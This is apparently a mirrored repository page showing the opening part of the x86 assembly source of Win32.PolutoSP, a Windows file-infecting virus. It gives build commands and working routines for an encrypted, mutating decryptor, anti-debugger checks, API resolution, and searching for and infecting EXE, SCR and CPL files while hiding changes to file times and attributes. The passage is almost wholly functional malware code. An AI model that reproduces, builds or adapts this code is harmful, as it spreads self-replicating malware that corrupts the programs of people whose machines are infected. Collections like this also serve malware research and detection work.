Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
464e532a4b
vxug-MalwareSourceCode/Win32/Win32.PolutoSP.asm
vxunderground e6e7892f53
Add files via upload
2020-10-10 22:09:34 -05:00

2328 lines
65 KiB
NASM
Raw Blame History

;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Name: Win32.PolutoSP (Version:2.0) *
;* Target: Portable Exe (PE), SCR, CPL *
;* Author: PiKaS lordjoker@hotmail.com *
;* Characteristics: *
;* Semi-Morfic Virus (uses 32 bit keys) *
;* Resident Per-Process (Hooks APIs like CreateFileA, etc...) *
;* Direct Action Virus (Windows, System and Actual Directories) *
;* Anti-Debugging (Jump if a Debug program is detected...SoftIce) *
;* CRC32 CheckSum File (Rebuild CRC32 of Infected Files) *
;* Detect SFC protected files and Installation Kits *
;* Payload: *
;* Graphic payload (one month later, if 31th: rare spots appear *
;* on the window and more...) *
;* Size: 6519 Bytes *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Author Notes: This Virus is dedicated to a dead friend *
;* Thanks to Dream Theater, Raphsody and Bind Guardian Music *
;* To Wintermute and BillyBel Tutes and Neuromancer Book ;) *
;* Sorry for my poor English :P *
;* To Build this: *
;* tasm32 -m7 -ml -q -zn P01UT0SP.asm *
;* tlink32 -Tpe -c -aa -v P01UT0SP ,,, import32 *
;* pewrsec P01UT0SP.exe *
;* InfMark P01UT0SP.exe /POLT *
;* (The Last is a program that put an Infection Mark 'POLT' *
;* in the Executable File) *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Disclaimer: *
;* This software is for research purposes only *
;* The author is not responsible for any problems caused due to *
;* improper or illegal usage of it *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
.486p ; let's rock
.model flat, stdcall
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Exported APIs for the Host *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
extrn MessageBoxA:proc ; A Message Box for 1st generation
extrn ExitProcess:proc
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Definition of constants *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
MAX_PATH equ 260
TamInfo equ offset V_Info@2 - offset V_Info@1 ; Shit Size
TamVirus@1 equ offset V_FinalVirus - offset V_Virus ; Virus Encripted Size
TamVirus@2 equ offset V_FinalVirus - offset V_InicioVirus ; Total Size
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Definition of structures *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
FILETIME STRUC ; File's time
LowDateTime DD ?
HighDateTime DD ?
FILETIME ENDS
WIN32_FIND_DATA STRUC ; FindFirst/NextFile Structure
Atributos DD ?
CreationTime FILETIME ?
LastAccessTime FILETIME ?
LastWriteTime FILETIME ?
FileSizeHigh DD ?
FileSizeLow DD ?
Reserved0 DD ?
Reserved1 DD ?
FileName DB MAX_PATH DUP (?)
AlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
WIN32_FIND_DATA ENDS
SYSTEMTIME STRUC ; System's time (to make some cool things!!)
Year DW ?
Mes DW ?
DiaSemana DW ?
Dia DW ?
Hora DW ?
Minutos DW ?
Segundos DW ?
Milisegundos DW ?
SYSTEMTIME ENDS
MEMORY_BASIC_INFORMATION STRUC ; If we have to unprotect some memory space
BaseAddress DD ? ; This Structure inform about memory propieties
AllocationBase DD ?
AllocationProtect DD ?
RegionSize DD ?
State DD ?
Protect DD ?
lType DD ?
MEMORY_BASIC_INFORMATION ENDS
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Host Date Section *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
.data
N_Titulo db 'Win32.PolutoSP',0 ; A Stupid Message Box text
N_Texto db 'Win32.PolutoSP X [*PiKaS*]LaBs',0
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Host Code Section *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
.code
V_InicioHost: ; A simple 1st generation host, only shows a xor eax,eax ; Message Box and finish program
push eax
push offset N_Titulo
push offset N_Texto
push eax
call MessageBoxA ; Hello... nock, nock...!
xor eax,eax
push eax
call ExitProcess ; Bye!
V_Entrada:
call V_InicioVirus ; This is the Entry Point of Host (always in
; code section) and call to the last section
; where the Virus waits...
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Virus Start *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_InicioVirus:
pushad ; Is not importat, but I make it always
pushfd
mov ebp,00h ; Move the Delta Offset to ebp
V_Delta equ $-4
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Virus Decriptor Start *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_Desencriptar:
not eax ; Some Shit Instructions...
mov ecx,00h ; The Virus have 8 decriptors and use each time
xor eax,ebx ; a ramdon 32 bit new key
sahf
mov edx,TamVirus@1
push eax
pop ebx
or ax,bx
lea esi,[V_Virus+ebp]
and eax,ebx
stc
V_Bucle:
xor byte ptr[esi],cl ; Use SUB/XOR/ADD/ROL/ROR instructions
daa
neg ax
add byte ptr[esi],cl
lahf
dec ebx
inc esi ; Next byte to Decript
not eax
ror ecx,08h ; Ror the 32 Bits Key
inc ebx
inc eax
dec edx
jnz V_Bucle ; Here jump until the Virus Body is decripted
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* A rare way to get the actual ImageBase *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_Virus:
call Delta@1
Delta@2:
mov esi,esp
lodsd ; Get the return address
jmp Delta@3
Delta@1:
xor eax,eax
jz Delta@2
Delta@3:
add esp,04h
sub eax,offset Delta@2 - offset V_InicioVirus ; The Base of Virus Code
sub eax,00001000h + offset V_InicioVirus - offset V_InicioHost ; HardCoded in
V_RvaVirus equ $-4 ; 1st generation
mov [H_ImageBase+ebp],eax ; We have the ImageBase
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Virus Body Start *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
call GetKernelAddress ; Obtain the Kernel Base Address
or eax,eax ; If Error -> go to Host
jz V_VirusError
call GetApiAddress ; Get All the APIs we need
or eax,eax ; If Error -> go to Host
jz V_VirusError
call AntiDebugging ; Check for Debuggers
or eax,eax ; If a Debugger is present -> go out now
jz V_VirusError
call IniciarSemilla ; Make a new random 32 bit number (for RNG)
call LoadSfcProtected ; Check if SFC.dll is present in System
call RuntimeVirus ; Just Find Target Files (Direct Action Part)
or ebp,ebp ; If 1st generation -> go to Host
jz V_VirusError
call SetAllHooks ; Set Hooks in ImportTable for Resident Part
call PayloadVirus ; Is time to rock!!...hahaha
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Return Control to Host *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
V_VirusError:
call SetReEntrada ; Set up Re-Entry (Need in CPLs Files)
V_VueltaHost:
mov eax,[H_ImageBase+ebp] ; Get Real Host Entry Point
add eax,00001000h ; HardCoded RVA Host and put it on stack
V_RvaHost equ $-4
mov [esp+24h],eax
popfd ; Recuperate initial registers values and jump
popad ; to the Host Entry Point
ret
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function: Align Values *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
AlinearCifra proc
push edx ; Save some registers
push ecx
mov ecx,[H_Alineamiento+ebp] ; Take the Align factor
xor edx,edx
push eax
div ecx ; Align with it the eax value
pop eax
sub ecx,edx
add eax,ecx ; And we have the Aligned Value in eax
pop ecx
pop edx
ret
AlinearCifra endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Virus Function Anti-Debuggers *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
AntiDebugging proc
lea eax,[N_IsDebuggerPresent+ebp] ; Check for IsDebuggerPresent API
push eax
mov eax,[@_KernelAddress+ebp]
push eax
call [@_GetProcAddress+ebp]
or eax,eax
jz NoDebuggerPresent@1 ; If don't have the API... go out!
call eax ; Is a Debbuger Present... yes! hoho
or eax,eax
jnz DebuggerPresent@1
NoDebuggerPresent@1:
lea esi,[N_Sice+ebp] ; Check for SoftIce in Win9x
call CreateFile ; Create the Debugger
inc eax
jz NoDebuggerPresent@2
dec eax ; Hummm... SoftIce win9x is present!
call CloseHandleB
jmp DebuggerPresent@1
NoDebuggerPresent@2: ; Check for SoftIce in WinNt
lea esi,[N_Nice+ebp]
call CreateFile
inc eax
jz NoDebuggerPresent@3
dec eax ; Hummm... SoftIce winNT is present!
call CloseHandleB
DebuggerPresent@1:
xor eax,eax ; If zero returned -> Debugger Present
ret
NoDebuggerPresent@3:
xor eax,eax ; If non zero returned -> Debugger no Present
inc eax
ret
AntiDebugging endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Check possible Hosts *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
ArchivoOk proc
push edi ; Save some registers
push esi
mov eax,[DatosArchivo.FileSizeLow+ebp] ; Use Size-Padding to detect infected
mov ecx,75h ; files (Size -> 75h)
xor edx,edx
div ecx
or edx,edx
jz ArchivoOkError@1
mov eax,[DatosArchivo.Atributos+ebp] ; If is a System or a Directory or a
and eax,0814h ; compressed File... don't touch
jnz ArchivoOkError@1
lea esi,[DatosArchivo.FileName+ebp]
call SfcIsFileProtected ; Check if the File is SFC protected
or eax,eax
jnz ArchivoOkError@1
call CreateFile ; Create and Open the File
inc eax ; saving attributes and Date
jz ArchivoOkError@1
dec eax
mov [H_HandleOpen+ebp],eax ; Save the Handle
mov ebx,eax
mov edi,[DatosArchivo.FileSizeLow+ebp]
mov esi,[DatosArchivo.FileSizeHigh+ebp]
cmp edi,4000h ; Avoid to infect little and huge
jb ArchivoOkError@2 ; files... well
cmp edi,03E80000h
jg ArchivoOkError@2
call FileMapping ; Make a File Mapping
or eax,eax
jz ArchivoOkError@2
mov [H_HandleMapa+ebp],eax ; And save the handle of map
mov ebx,eax
call MapViewFile ; And finally create a map view of File
or eax,eax
jz ArchivoOkError@3
mov [@_DirArchivo+ebp],eax ; Save the mapping address
mov edi,eax
mov ax,[edi]
cmp ax,'ZM' ; Check for Dos Signature
jnz ArchivoOkError@4
mov ax,[edi+18h]
cmp ax,40h ; Is a Dos Exe or a New Exe?
jnz ArchivoOkError@4
mov eax,[edi+3Ch]
add edi,eax
mov ax,[edi] ; Is a Portable Exe?
cmp ax,'EP'
jnz ArchivoOkError@4
mov eax,[edi+08h]
cmp eax,'POLT' ; Have been infected yet?
jz ArchivoOkError@4
mov ax,[edi+06h]
cmp ax,03h ; At least 3 sections
jc ArchivoOkError@4
mov ax,[edi+14h]
or ax,ax ; With Optional Header
jz ArchivoOkError@4
mov ax,[edi+16h]
and ax,0002h ; Check for Executable
jz ArchivoOkError@4
mov eax,[edi+2Ch]
or eax,eax ; Avoid Dlls with zero code size
jz ArchivoOkError@4
mov ax,[edi+04h]
cmp ax,014Ch ; Only Intel386
jnz ArchivoOkError@4
mov ax,[edi+5Ch]
dec ax ; SubSystem Windows GUI
dec ax
jz ArchivoOk@1
ArchivoOkError@4: ; If we have an Error... just Unmap
mov ebx,[@_DirArchivo+ebp] ; and CloseHandle
call UnmapFile
ArchivoOkError@3:
mov eax,[H_HandleMapa+ebp]
call CloseHandleA
ArchivoOkError@2:
mov eax,[H_HandleOpen+ebp]
call CloseHandleB
ArchivoOkError@1:
pop esi
pop edi
xor eax,eax ; Return zero -> Bad File
ret
ArchivoOk@1: ; File is Ok, before infect it we
mov ecx,[edi+3Ch] ; take some values like File Alignment
mov [H_Alineamiento+ebp],ecx
mov ebx,[@_DirArchivo+ebp]
call UnmapFile
mov eax,[H_HandleMapa+ebp]
call CloseHandleA
pop esi
pop edi
xor eax,eax ; Return a non zero value -> File Ok
inc eax
ret
ArchivoOk endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Search and Infection Virus Routines *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
BuscarArchivos proc
lea esi,[V_Mascara@1+ebp] ; We want Exe, Scr and Cpl Files Now!!
mov edi,03h ; 3 Exe Files Counter
BuscarOtro@4:
lea eax,[DatosArchivo+ebp] ; Push some pointers and values...
push eax
mov eax,esi
push eax
call [@_FindFirstFileA+ebp] ; And call FindFirstFileA API
inc eax
jz BuscarArchivoError@2 ; No more Files? Ok... see ya!
dec eax
mov [H_HandleArchivo+ebp],eax
BuscarOtro@1:
call ArchivoOk ; Is File Ok to Infect?
or eax,eax
jz BuscarOtro@2 ; No?... well, I want more
call InfectarArchivo ; Yes?... whahaha... Infect It Now!
or eax,eax
jz BuscarOtro@2
dec edi ; If File Infection is success decrement counter
jz BuscarArchivoError@1
BuscarOtro@2:
lea eax,[DatosArchivo+ebp] ; Push some pointers and values again
push eax
mov eax,[H_HandleArchivo+ebp]
push eax
call [@_FindNextFileA+ebp] ; Give me more Files
or eax,eax
jnz BuscarOtro@1 ; If more Files are found... repeat process
BuscarArchivoError@1:
mov eax,[H_HandleArchivo+ebp]
push eax
call [@_FindClose+ebp] ; Close Actual File Search
BuscarArchivoError@2:
mov edi,esi ; Change the actual Target (Exe, Scr or Cpl)
xor eax,eax ; and repeat process again
BuscarOtro@5:
scasb
jnz BuscarOtro@5
mov esi,edi
mov al,[edi]
xor edi,edi
inc edi
cmp al,0BBh
jnz BuscarOtro@4 ; If no more Targets... bye!
ret
BuscarArchivos endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Check the Entry Point *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CheckEntryPoint proc
push edi ; Save some registers
push esi
mov edx,eax ; We have in eax the Image Base and want to
push eax ; find the Image Section Header
add edx,[edx+3Ch]
mov esi,edx
add esi,18h
movzx ebx,word ptr[edx+14h]
add esi,ebx
movzx ecx,word ptr[edx+06h]
mov edi,esi
mov eax,[edx+28h] ; Put in eax the Real Entry Point
CheckEntry@1:
mov ebx,[edi+0Ch] ; Check for the Code Section (the Section that
cmp eax,ebx ; is pointed by the Entry Point)
jc CheckEntry@2
add ebx,[edi+10h]
cmp eax,ebx
jnc CheckEntry@2
mov esi,edi
jmp CheckEntry@3 ; Humm... here is it! take note
CheckEntry@2:
add edi,28h
loop CheckEntry@1
jmp CheckError@1 ; If no Code Section is found... grrr... Error
CheckEntry@3:
mov ebx,[esi+10h] ; We have the Code Section Header... Let's
mov ecx,[esi+08h] ; save some values
cmp ecx,ebx
jnc CheckError@1
sub ebx,ecx
cmp ebx,06h ; Have 6 bytes free to put some instructions?
jc CheckError@1
pop eax
mov ebx,ecx
add ecx,[esi+14h] ; Well, some Rva and Raw plus the address
add ebx,[esi+0Ch] ; of mapping File... for later actions
add ecx,eax
mov edx,esi
pop esi
pop edi
ret
CheckError@1:
xor ecx,ecx ; If error -> return a zero value
pop eax
pop esi
pop edi
ret
CheckEntryPoint endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to calculate the File CheckSum *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CheckSumMappedFile proc
push esi ; Save some registers
push ebx
push ecx
inc ecx
shr ecx,01h ; Is a Revised version of CheckSumMappedFile API
call ParcialCheckSum ; Call to make the partial CheckSum
add esi,[esi+3Ch]
mov bx,ax ; We have to make some changes after and...
xor edx,edx
inc edx
mov ecx,edx
mov ax,[esi+58h]
cmp bx,ax
adc ecx,-01h
sub bx,cx
sub bx,ax
mov ax,[esi+5Ah]
cmp bx,ax
adc edx,-01h
sub bx,dx
sub bx,ax
xor eax,eax
mov ax,bx
pop ecx
add eax,ecx
mov [esi+58h],eax ; Here is the CRC File CheckSum in eax
pop ebx ; Restore register and finish
pop esi
ret
CheckSumMappedFile endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Validate the File CheckSum *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CheckSumValido proc
push esi
add esi,[esi+3Ch] ; Just Look if the File CheckSum is different
mov eax,[esi+58h] ; to Zero (no CheckSum is used if Zero)
pop esi
ret
CheckSumValido endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Close a Handle (A=Don't Truncate File) *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CloseHandleA proc
push eax
call [@_CloseHandle+ebp] ; Just Close a Handle
ret
CloseHandleA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Close a Handle (B=Truncate File) *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CloseHandleB proc
push esi
mov esi,eax
lea eax,[DatosArchivo.LastWriteTime+ebp] ; Replace LastWriteTime of File
push eax
xor eax,eax
push eax
push eax
push esi
call [@_SetFileTime+ebp] ; And make the change effective
push esi
call [@_CloseHandle+ebp] ; Close File Handle and replace
push [H_AtributosFile+ebp] ; the original File Attributes
lea eax,[DatosArchivo.FileName+ebp]
push eax
call [@_SetFileAttributesA+ebp]
pop esi
ret
CloseHandleB endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to copy Virus in the New Host *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CopiarHostNuevo proc
mov edi,[@_DirArchivo+ebp] ; Set edi and esi to make the Virus Body Copy
add edi,[esi+14h]
add edi,ebx
lea esi,[V_InicioVirus+ebp]
mov ecx,TamVirus@2 ; Move the Total Size of Virus
push esi
push edi
rep movsb ; Well, move all... hahaha
pop edi
pop esi
mov ecx,edi
mov eax,[H_Delta+ebp] ; Before Encript set some internal values
add ecx,offset V_Delta - offset V_InicioVirus
mov [ecx],eax ; Like Delta, Rva to Virus, Rva to Host and
mov eax,[H_RvaVirus+ebp] ; the Month Date for payload activation
add ecx,offset V_RvaVirus - offset V_Delta
mov [ecx],eax
mov eax,[H_RvaHost+ebp]
add ecx,offset V_RvaHost - offset V_RvaVirus
mov [ecx],eax
mov ax,[SysDate.Mes+ebp]
add ecx,offset V_MesVirus - offset V_RvaHost
mov [ecx],ax ; That's all for now!
ret
CopiarHostNuevo endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Open Files *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
CreateFile proc
push esi
call [@_GetFileAttributesA+ebp] ; Get the original File Attributes
inc eax
jz CreateFileError@1 ; If error -> don't open file
dec eax
mov [H_AtributosFile+ebp],eax ; And make File Attributes Normal Archive
push 00000080h
push esi
call [@_SetFileAttributesA+ebp] ; Make effective the change
or eax,eax
jz CreateFileError@1
xor eax,eax ; push some typical values
push eax
push eax
push 03h ; Open existing File
push eax
inc eax
push eax
push 0C0000000h ; Read and Write Access
push esi
call [@_CreateFileA+ebp] ; And Create the File that our baby want...
ret
CreateFileError@1:
dec eax ; If Error -> Return zero
ret
CreateFile endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Unprotect a Memory Section *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
DesprotegerMemoria proc
push TamInfo
lea eax,[InfoMemoria+ebp] ; Get the Memory Section Info
push eax
push ebx
call [@_VirtualQuery+ebp] ; How are you?
or eax,eax
jz DesprotegerError@1 ; Humm, error?... don't change then
lea eax,[InfoMemoria.Protect+ebp] ; Fine... Make the Section Writeable
push eax
push 04h
push dword ptr[InfoMemoria.RegionSize+ebp]
push dword ptr[InfoMemoria.BaseAddress+ebp]
call [@_VirtualProtect+ebp] ; Now, we can write in Import Section
DesprotegerError@1:
ret
DesprotegerMemoria endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to encript Virus Body in New Host *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
EncriptarHostNuevo proc
call NuevoDesencriptar ; First we create a new Decriptor Routine
add edi,offset V_Virus - offset V_InicioVirus
imul eax,eax,04h ; And Change the Encription Routine
lea esi,[V_Encriptores+ebp]
add esi,eax ; Move the New Instructions
lodsd
lea edx,[V_BucleEncriptar+ebp] ; Set Destination and Origin of the Copy
mov [edx],eax
mov edx,TamVirus@1
V_BucleEncriptar: ; And copy the Encripted Virus
rol byte ptr[edi],cl ; This instructions change in execution with
xor byte ptr[edi],cl ; the correct ones (acording to the generated
inc edi ; Decription Routine)
ror ecx,08h
dec edx
jnz V_BucleEncriptar
ret ; Bye!
EncriptarHostNuevo endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to create a File Map *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
FileMapping proc
xor eax,eax ; Just push some typical values and call
push eax ; the CreateFileMappingA API
push edi
push esi
push 04h ; Page with Read and Write
push eax
push ebx
call [@_CreateFileMappingA+ebp] ; Create the File Mapping
ret
FileMapping endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to get an API Address *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
FullApiAddress proc
FullApi@1:
push edi ; Save some registers
push esi
call [@_GetProcAddress+ebp] ; We need some API address...
or eax,eax ; Give me the APIs!!! haha
jz FullApiError@1
mov [ebx],eax ; If no error we have one... save it
add ebx,04h ; And move pointer to get the next one
xor al,al
FullApi@2:
scasb ; Next API Name...and go back
jnz FullApi@2
cmp byte ptr[edi],0BBh
jnz FullApi@1 ; If Finish... job done
xor eax,eax ; Well... non zero -> all under control
inc eax
ret
FullApiError@1:
xor eax,eax ; Zero -> something fails... abort!
ret
FullApiAddress endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Get all APIs that we need *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
GetApiAddress proc
mov ebx,[eax+3Ch] ; We are in the Kernel Base...
add eax,ebx
mov bx,[eax]
cmp bx,'EP' ; And have now the Portable Exe Header pointer
jnz GetApiError@1
mov ebx,[eax+78h]
mov eax,[@_KernelAddress+ebp]
mov edx,eax
add eax,ebx
mov ecx,edx
mov ebx,[eax+1Ch] ; Now we need to know where are AddressTable,
add ebx,ecx ; NameTable and Ordinal Table...
mov [@_AddressTable+ebp],ebx
mov ebx,[eax+20h]
add ebx,ecx
mov [@_NameTable+ebp],ebx ; And get the address
mov ebx,[eax+24h]
add ebx,ecx
mov [@_OrdinalTable+ebp],ebx
xor ebx,ebx
mov esi,[@_NameTable+ebp]
GetApi@2:
lodsd ; Well... try to Find the GetProcAddress
add eax,edx ; String for Virus
mov ecx,[eax]
cmp ecx,'PteG'
jnz GetApi@1
mov ecx,[eax+04h]
cmp ecx,'Acor'
jnz GetApi@1
mov ecx,[eax+08h]
cmp ecx,'erdd'
jnz GetApi@1
jmp GetApi@3 ; Great! we have found the API string!
GetApi@1:
inc ebx
jmp GetApi@2
GetApi@3:
shl ebx,01h ; Get the API Ordinal...
add ebx,[@_OrdinalTable+ebp]
movzx eax,word ptr[ebx]
shl eax,02h
add eax,[@_AddressTable+ebp] ; ... with the address of API pointer
mov ebx,[eax]
add ebx,edx ; And finaly we have the API actual address
mov [@_GetProcAddress+ebp],ebx
mov esi,edx
lea ebx,[V_Direcciones@1+ebp] ; Time to get all API we need...
lea edi,[V_Nombres@1+ebp] ; Set some pointers to Strings and Addresses
call FullApiAddress ; Fill in with this process all
or eax,eax
jz GetApiError@1
xor eax,eax ; No error -> non Zero value
inc eax
ret
GetApiError@1:
xor eax,eax ; Zero -> arghh... shit! an error
ret
GetApiAddress endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Get the Kernel Base *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
GetKernelAddress proc
mov eax,[esp+2Ch] ; Look on the Stack and get the CreateProcess
and eax,0FFFF0000h ; address... and go down until we get the
mov ecx,05h ; famous MZ signature...
GetKernel@1:
mov bx,[eax]
cmp bx,'ZM'
jz GetKernel@2 ; hahaha... The Kernel Address!
sub eax,00010000h ; Nop! go down
loop GetKernel@1
xor eax,eax ; Error -> eax zero
GetKernel@2:
mov [@_KernelAddress+ebp],eax ; We have now the Kernel Base Address!
ret
GetKernelAddress endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to make a random number with a Range *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
GetRndRange proc
push ecx ; Save some registers
push edx
mov ecx,eax
call Random ; Call Random Function
xor edx,edx ; Make a number in the Range
div ecx
mov eax,edx ; And we have a random number in eax
pop edx
pop ecx
ret
GetRndRange endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of CopyFileA API *
